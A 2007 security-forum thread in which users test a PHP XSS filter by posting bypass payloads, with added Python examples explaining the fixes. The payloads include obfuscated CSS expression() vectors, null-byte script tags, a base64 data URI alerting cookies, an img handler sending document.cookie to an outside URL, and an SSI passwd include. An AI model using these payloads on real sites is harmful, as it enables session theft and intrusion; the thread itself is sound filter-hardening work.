Sla.ckers.org
XSS Filter
Date: January 19, 2007 04:07PM

Hello everyone,

For a little while now I have been tweaking and revising a forum extension meant to strip out javascript from html, which I originally threw together as a better replacement for the previous one. Firstly I'd just like to thank rsnake for his comprehensive list of possible xss attacks; I've found the page to be extremely useful in trying to make this a safe but 'defensive' filter (by defensive I mean it tries to alter the original content as little as possible).

So I've tried every xss example on rsnake's page against it, and it seems to manage to catch every one (although I'm not too sure about the js include thing, as I haven't actually tried that so I'm not 100% sure replacing the ampersand with & would work or not...) However, one can never be too sure, so I'd be really grateful if some of you guys could test it for me. Just, like, try to find a way to insert js :-P

You can find a test page here: http://sirnot.110mb.com/htmlformatter.php
and the source here: http://sirnot.110mb.com/htmlformatter.php.txt
(and here's a version with purdy colors: http://sirnot.110mb.com/htmlformatter.php.html )

Thanks in advance for any help :-)

Re: XSS Filter
Posted by: Anonymous User
Date: January 19, 2007 04:30PM

very nice work! i will definitely give it a try.

Re: XSS Filter
Posted by: Spikeman
Date: January 20, 2007 10:19PM

The page times out.

Re: XSS Filter
Date: January 21, 2007 04:43AM

damnit, I swear I am cursed to have bad luck with free web hosts...

well here's the source, at least: http://sirnot.googlepages.com/htmlformatter.php.txt

Re: XSS Filter
Posted by: Spikeman
Date: January 21, 2007 10:18PM

It works now, looks like it works pretty well, but it is a little strange how it changes onload to &#111;nload. I wonder if this could somehow be exploited?

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 12:19PM

This looks really interesting. I'm going to play with it for a bit. So far so good though. Thanks for the contribution, SirNotAppearingOnThisForum!

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Date: January 22, 2007 12:51PM

@spikeman: it changes things like on[whatever] to an HTML entity equivalent so URLs and other legitimate attributes that happen to have that combination aren't messed up. E.g. a URL like http://example.com/bla?onregister=redirect would still function normally if the onregister was changed to &#111;nregister.

thanks to everyone for taking the time to look at it :-)

EDIT: fixed url example



Edited 4 time(s). Last edit at 01/22/2007 12:58PM by SirNotAppearingOnThisForum.
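
The behaviour SirNot describes above, as an added example that is not part of the thread or of the filter's source: HTML decodes character references inside attribute values and text but never inside attribute names, so once the "o" of on* becomes &#111; the browser no longer sees an event handler, while a query parameter called onregister inside an href still decodes back to "onregister". Python's html.parser applies the same rule and stands in for the browser here; neutralise_on_attrs is a hypothetical, deliberately simplified version of the filter's rule, and the two input fragments are constructed.

```python
"""Why entity-encoding the "o" of on* disarms handlers but leaves URLs intact.
Added example, not the thread's filter; html.parser stands in for the browser."""
import re
from html.parser import HTMLParser


class AttrRecorder(HTMLParser):
    """Collect (tag, attribute name, decoded attribute value) for each start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            self.attrs.append((tag, name, value))


def parse_attrs(fragment):
    """Parse an HTML fragment as a browser would and return its attributes.
    Names come back raw (no entity decoding); values come back decoded."""
    p = AttrRecorder()
    p.feed(fragment)
    p.close()
    return p.attrs


def neutralise_on_attrs(fragment):
    """Hypothetical, simplified stand-in for the thread's rule: any word "on"
    followed by letters and "=" gets its "o" replaced by the decimal
    character reference &#111;.  It deliberately fires inside URL query
    strings too, which is the case the post says must keep working."""
    return re.sub(r'(?i)\bon(?=[a-z]+\s*=)', '&#111;n', fragment)


def event_handlers(fragment):
    """Attribute names a browser would treat as event handlers (on...)."""
    return [name for _, name, _ in parse_attrs(fragment)
            if name.lower().startswith('on')]


def hrefs(fragment):
    """Decoded href values, i.e. what the browser would actually navigate to."""
    return [value for _, name, value in parse_attrs(fragment) if name == 'href']


# Constructed inputs: a handler injection and a legitimate URL containing "on".
HANDLER = '<img src="x" onload="alert(1)">'
URL = '<a href="http://example.com/bla?onregister=redirect">go</a>'

if __name__ == '__main__':
    for fragment in (HANDLER, URL):
        filtered = neutralise_on_attrs(fragment)
        print(filtered)
        print('  handlers seen by parser:', event_handlers(filtered))
        print('  decoded hrefs:          ', hrefs(filtered))
```

The check worth keeping from this is the asymmetry: an entity in an attribute name stays literal, so `&#111;nload` is just an unknown attribute, whereas the same entity inside the href value is decoded before the URL is used.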

Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 01:07PM

Pretty, pretty cool!

I gave it a spin just now with a few nulls:

I inputted this:
<s%00cript src="http://www.google.com/b0mbs.js"></SCRIPT>

I got this as result:
<s%00cript src="http://www.google.com/b0mbs.js"></s%00cript>


But I see that in the source the result is different than on screen? Intentionally?

I see that 's' is replaced with a carriage return: &#115;

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 01:13PM

Okay, I found one that definitely works around your filter, SirNotAppearingOnThisForum:

<A STYLE='xss:ex&&#x23;x2F;*XSS*//*/*/p/*/pres/*/ression(alert("XSS"))'>asdf</a>

Good try though. Keep working on it!

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Date: January 22, 2007 01:29PM

ok rsnake, try it now :-P (the source is now at http://sirnot.110mb.com/source.php , by the way; was easier than reuploading each time)

the reason it's a slightly different output, jungsonn, is because it a) removes all instances of <script> and </script> and b) it tries to make sure there aren't any stray opening/closing tags. As a consequence, it removed the closing tag and then recreated it.



Edited 1 time(s). Last edit at 01/22/2007 01:31PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 01:46PM

This seems to get through:

<A STYLE='xss:expression\(alert("XSS"))'>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 02:06PM

I assume <ilayer> gets through also, but that's NS4.

But I'm actually impressed by your work, without doubt one of the better filters I've seen so far regarding HTML input. Do you mind if I host it myself? Of course with credits and a blog notation about it.

edit: I guess a bigger array with more vectors would solve a lot more



Edited 1 time(s). Last edit at 01/22/2007 02:08PM by jungsonn.

Re: XSS Filter
Date: January 22, 2007 02:30PM

@rsnake: is that the only character that works there? Do you know if it works for url()s too (all the browsers I'm using seem to have stopped supporting js in css urls...)?

should be fixed for that one, though.

@jungsonn: sure, if you want to, but if I were you I'd wait until rsnake has stopped finding loopholes in it :-P



Edited 1 time(s). Last edit at 01/22/2007 02:31PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 03:11PM

<A STYLE='xss:expressio&#92;n(alert("XSS"))'>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 03:20PM

Sorry, I should have responded to your initial question. After checking my fuzzer it looks like only null and \ work in UTF-8.

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/22/2007 03:24PM by rsnake.

Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 03:24PM

Yeah you bet I wait ^^


I got a few more:

<s\0cript>

<ilayer src="http://www.google.com">

Alerting document.cookie:
data:text/plain;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

SSI:
</!--%20#include%20virtual="../../etc/passwd"%20-->

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 03:32PM

Here's another one (no obfuscation whatsoever):

<A style=xss:expression(alert("XSS"))>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 03:37PM

Haven't tested this one, but think it could work:

<img \0onLoad="javas\0cript:window.open('http://www.google.com/crap.php?c='+document.cookie)">

Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 04:02PM

Oh and a small one to start <script>.
Could be useful if at some place the script is being closed:

<&#83;alert('blah')</&#115;cript>

Re: XSS Filter
Date: January 22, 2007 04:49PM

yikes! those were some major bugs... (your last one, rsnake, was caused by the fact that the regex was non-greedy and there were no boundaries, so it simply retrieved one character)

ok, think I fixed those...

EDIT: make sure to refresh the cache if you're viewing the source



Edited 1 time(s). Last edit at 01/22/2007 04:50PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 06:01PM

Just tell me when you want me to stop. ;)

<A style=`xss:expression/*
*/(alert("XSS"))`>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 10:25PM

Okay, found another five issues:

<A style='xss:expr\0ession(alert("XSS"))'>asdf</a>
<A style='xss:expressione\xpression\(alert("XSS"))'>asdf</a>
<A style='xss:exp&\&#x23;x72;ession(alert("XSS"))'>asdf</a>
<A style='xss:expr/\**/ession(alert("XSS"))'>asdf</a>
<A style='xss:exp&#\x72;ession(alert("XSS"))'>asdf</a>

I think I'm done testing this one for a while. Sorry, SirNotAppearingOnThisForum, looks like this needs some work still.

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: anurag
Date: January 23, 2007 12:21AM

try to break this one...
10 bucks who can break this filter first

sorry SirNotAppearingOnThisForum, i dont want to steal your thunder. The original idea is still yours.

Cheers -

Anurag Agarwal
SEEC - Application Security Search Engine (http://www.myappsecurity.com)
http://www.attacklabs.com
blog - http://myappsecurity.blogspot.com

Re: XSS Filter
Posted by: anurag
Date: January 23, 2007 12:22AM

oops forgot to mention the url

here it is http://www.attacklabs.com/xssfilter/

Cheers -

Anurag Agarwal
SEEC - Application Security Search Engine (http://www.myappsecurity.com)
http://www.attacklabs.com
blog - http://myappsecurity.blogspot.com

Re: XSS Filter
Date: January 23, 2007 10:13AM

*grumbles incoherently...

I have fixed those, though...

@anurag: the point of this was to allow as much html as possible while stripping out javascript, not to simply remove all html + js.



Edited 1 time(s). Last edit at 01/23/2007 10:15AM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 10:23AM

anurag - I don't believe your filter can be broken without injecting into JavaScript space (since you don't attempt to filter +'s or any forms of quotes) or a selected encoding issue (since you don't remove plusses or minuses). But I think what SirNotAppearingOnThisForum is trying to show is how you can still use HTML without being vulnerable to XSS. And what I am proving is that filters are not as simple as most people think they are.

- RSnake
Gotta love it. http://ha.ckers.org
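
RSnake's five expression() vectors above, his earlier ones in this thread, and his point that filters are not as simple as they look, as an added worked example that is neither the thread's filter nor code from any of the posters. The idea it demonstrates is that a blacklist has to match on the value the consumer will act on, so every layer the bypasses rely on (NUL bytes, HTML character references, CSS backslash escapes, CSS comments) is peeled off and the decoding is repeated until nothing changes; the fixed-point loop is what defeats the double-encoded variants such as `&\&#x23;x72;`, which SirNot notes were caused by a single non-greedy pass with no boundaries. The vectors are RSnake's as posted; the NUL in the fifth is a real 0x00 byte, which the thread writes as \0. The benign sample value is constructed. This is a canonicaliser for the filter side, not an emulation of any particular browser's CSS parser.

```python
"""Canonicalise a CSS attribute value before checking for IE's expression().
Added example; not the thread's filter.  Peels NULs, HTML character
references, CSS backslash escapes and CSS comments until a fixed point."""
import html
import re

# CSS escape: backslash + 1-6 hex digits (+ one optional whitespace), or
# backslash + any other character, which stands for that character.
# Backslash + newline is a line continuation and disappears.
_CSS_ESCAPE = re.compile(r'\\(?:([0-9a-fA-F]{1,6})[ \t\n]?|(.))', re.S)
_CSS_COMMENT = re.compile(r'/\*.*?\*/', re.S)


def _css_unescape(value):
    def repl(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else ''   # NUL / out of range: dropped
        return '' if m.group(2) == '\n' else m.group(2)
    return _CSS_ESCAPE.sub(repl, value)


def canonicalise_css(value, max_rounds=8):
    """Decode one layer per round until nothing changes.  A single pass
    would be beaten by double encoding (&#x23;x72; -> &#x72; -> r)."""
    for _ in range(max_rounds):
        new = value.replace('\x00', '')
        new = html.unescape(new)      # attribute value: browser decodes refs
        new = _css_unescape(new)
        new = _CSS_COMMENT.sub('', new)
        if new == value:
            break
        value = new
    return value.lower()


def naive_has_expression(value):
    """The kind of substring blacklist the thread keeps breaking."""
    return 'expression' in value.lower()


def canonical_has_expression(value):
    """Blacklist applied to the canonical form; requires the call syntax."""
    return re.search(r'expression\s*\(', canonicalise_css(value)) is not None


# RSnake's vectors from this thread (attribute value only, quotes stripped).
VECTORS = {
    'plain':            'xss:expression(alert("XSS"))',
    'escaped paren':    r'xss:expression\(alert("XSS"))',
    'entity backslash': r'xss:expressio&#92;n(alert("XSS"))',
    'comment':          'xss:expression/*\n*/(alert("XSS"))',
    'nul':              'xss:expr\x00ession(alert("XSS"))',
    'double word':      r'xss:expressione\xpression\(alert("XSS"))',
    'double encoded':   r'xss:exp&\&#x23;x72;ession(alert("XSS"))',
    'escaped comment':  r'xss:expr/\**/ession(alert("XSS"))',
    'escape in ref':    r'xss:exp&#\x72;ession(alert("XSS"))',
    'comment soup':     r'xss:ex&&#x23;x2F;*XSS*//*/*/p/*/pres/*/ression(alert("XSS"))',
}
# Constructed benign value: contains the word but never the call.
BENIGN = 'font-family: "Expressionist"; background: url(x.png)'


def compare(vectors=VECTORS):
    """Return {name: (naive verdict, canonical verdict)} for each vector."""
    return {k: (naive_has_expression(v), canonical_has_expression(v))
            for k, v in vectors.items()}


if __name__ == '__main__':
    for name, (naive, canon) in compare().items():
        print(f'{name:18} naive={naive!s:5} canonical={canon}')
    print('benign:', canonical_has_expression(BENIGN))
```

The naive substring check catches only the four vectors that happen to keep the literal word intact; the canonical check flags all ten and still passes the benign value, because it insists on `expression(` after decoding rather than on the bare word. The remaining weakness of any such blacklist is that it only knows the layers it was taught, which is the reason the later posts point at a whitelisting parser like HTML Purifier instead.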

Re: XSS Filter
Posted by: Anonymous User
Date: January 23, 2007 10:28AM

@rsnake: yep. Take a look at the HTML Purifier sources (in case you didn't, which I consider unlikely) - btw that thing is the only filter I kind of trust and use in production environments...

Greetings,
.mario

Re: XSS Filter
Date: January 23, 2007 10:58AM

could you just give it one more shot, rsnake? just, like 2 minutes max. I only want to see if it's still reasonably easy to exploit, as I'm sure there will always be a way around it...

regardless, thank you very, very much for you help.

Re: XSS Filter
Posted by: jungsonn
Date: January 23, 2007 11:33AM

Yeah, to be strict: it's for allowing HTML, and that's a tough nut to crack and do correctly. I think SirNot's filter does it pretty well; it's limited to a very few vectors that are left.

Sirnot: If I may say so, you could filter against certain chars on the ASCII chart; it could be useful because some exotic chars can break up your PHP functions, like Chinese BIG5 or GBK. It's not due to your code, but to PHP's functions themselves, which allow buffer overflows on multibyte characters above 8 bytes like Greek chars in ASCII: &#916;

I wrote a little snippet for myself to not allow ASCII above 175 (most used chars).

// collect the code point of every decimal character reference (&#NNN) in $input
preg_match_all('/&#(\d+)/', $input, $chars);
foreach ($chars[1] as $char) {
    if ($char > 175) {
        # do something
    }
}


Anyhow, Your's is getting close to an excellent HTML filter.

Re: XSS Filter
Date: January 23, 2007 11:47AM

well the problem with that is that it needs to remain as international as possible, so regrettably removing chars/entities that are over a certain length wouldn't really be an option. (not sure exactly how 'international' the preg_replace functions are, but at least I'd rather not proactively remove chars > a certain length)



Edited 1 time(s). Last edit at 01/23/2007 11:52AM by SirNotAppearingOnThisForum.
